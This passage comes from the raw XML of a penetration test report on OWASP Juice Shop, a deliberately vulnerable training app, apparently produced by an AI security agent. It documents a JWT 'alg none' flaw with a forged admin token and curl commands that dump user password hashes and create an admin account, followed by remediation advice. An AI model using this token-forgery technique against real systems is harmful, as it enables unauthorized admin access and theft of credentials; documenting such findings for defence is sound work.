      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Details:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- The application uses RS256 (RSA) for JWT signing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- However, it fails to validate the algorithm and accepts tokens with alg:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- By removing the signature and changing the algorithm to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, any user can forge admin tokens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Vector:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Original token uses RS256 algorithm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Attacker modifies header to use alg:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Attacker removes the signature portion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Server accepts the forged token without verification</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5. Attacker gains admin privileges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Capture legitimate JWT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">POST /rest/user/login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9…</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Modify to use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">algorithm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Original Header: {</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“typ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“JWT”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“alg”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“RS256”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Modified Header: {</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“typ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“JWT”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“alg”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“none”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Create forged token (no signature)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NDAsImVtYWlsIjoianR0X3Rlc3RAdGVzdC5jb20iLCJyb2xlIjoiYWRtaW4iLCJpc0FjdGl2ZSI6dHJ1ZX0sImlhdCI6MTc3MTYxNTIzOH0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Access admin data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">curl -H</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Authorization: Bearer FORGED_TOKEN”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">http://localhost:3333/api/Users/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Result: Complete list of all users including admin accounts with password hashes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: Create admin user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">curl -X POST -H</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Authorization: Bearer FORGED_TOKEN”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">http://localhost:3333/api/Users/ -d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘{</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“email”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“hacked_admin@test.com”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“password”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Hacked123!”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“role”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“admin”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">}’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Result: Successfully created new admin account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">jwt_exploit_admin_panel.png shows access to Administration panel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Explicitly whitelist allowed algorithms</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Configure JWT library to only accept RS256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">algorithm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Never accept tokens with alg:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Validate algorithm against whitelist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Check header algorithm before verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Use strong JWT library</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Ensure jsonwebtoken or similar library is properly configured</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example secure configuration:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">jwt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">verify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> publicKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">algorithms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'RS256'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Only allow RS256</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">issuer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'juice-shop'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">audience</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'juice-shop'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="appendix-a---lists-scripts-and-raw-data"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Appendix A - Lists, Scripts and Raw Data</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="appendix-b---list-of-abbreviations"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Appendix B - List of Abbreviations</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="4375"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1870"/>
        <w:gridCol w:w="5060"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Abbreviation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Description</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CAPTCHA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Completely Automated Public Turing test to</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">tell Computers and Humans Apart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Common Vulnerability Scoring System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">File Transfer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Insecure Direct Object Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Message-Digest Algorithm 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OAuth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Open Authorization</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SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Structured Query Language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WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Web Application Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserv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www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId16" Target="https://www.first.org/cvss/v4.0/specification-document" TargetMode="External" /></Relationships>
</file>

<file path=word/_rels/footnotes.xml.rels><?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId22" Target="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId16" Target="https://www.first.org/cvss/v4.0/specification-doc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Application Penetration Test Report — v1.0</dc:title>
  <dc:creator>Performed by the OpenHack Security AgentIssued by Jane Doe (jane.doe@openhack.sec)</dc:creator>
  <dc:language>en</dc:language>
  <dc:subject>Security Assessment</dc:subject>
  <cp:keywords>Security, Assessment, Pentest, OpenHack</cp:keywords>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-20T19:25:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-20T19:25:50Z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ook">
    <vt:lpwstr>True</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="classoption">
    <vt:lpwstr>oneside</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="code-block-font-size">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="colorlinks">
    <vt:lpwstr>True</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="date">
    <vt:lpwstr>2026-02-20</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="geometry">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="header-includes">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="linkcolor">
    <vt:lpwstr>linkgreen</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="subtitle">
    <vt:lpwstr>Target System: OWASP Juice Shop v19.1.1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="table-use-row-colors">
    <vt:lpwstr>True</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="titlepage">
    <vt:lpwstr>True</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="13" name="titlepage-background">
    <vt:lpwstr>images/openhack-report-background.pdf</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="14" name="titlepage-rule-color">
    <vt:lpwstr>4A7C59</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="15" name="titlepage-rule-height">
    <vt:lpwstr>2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="16" name="titlepage-text-color">
    <vt:lpwstr>333333</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="17" name="toccolor">
    <vt:lpwstr>black</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="18" name="urlcolor">
    <vt:lpwstr>linkgreen</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="19" name="watermark">
    <vt:lpwstr>DRAFT</vt:lpwstr>
  </property>
</Properties>
</file>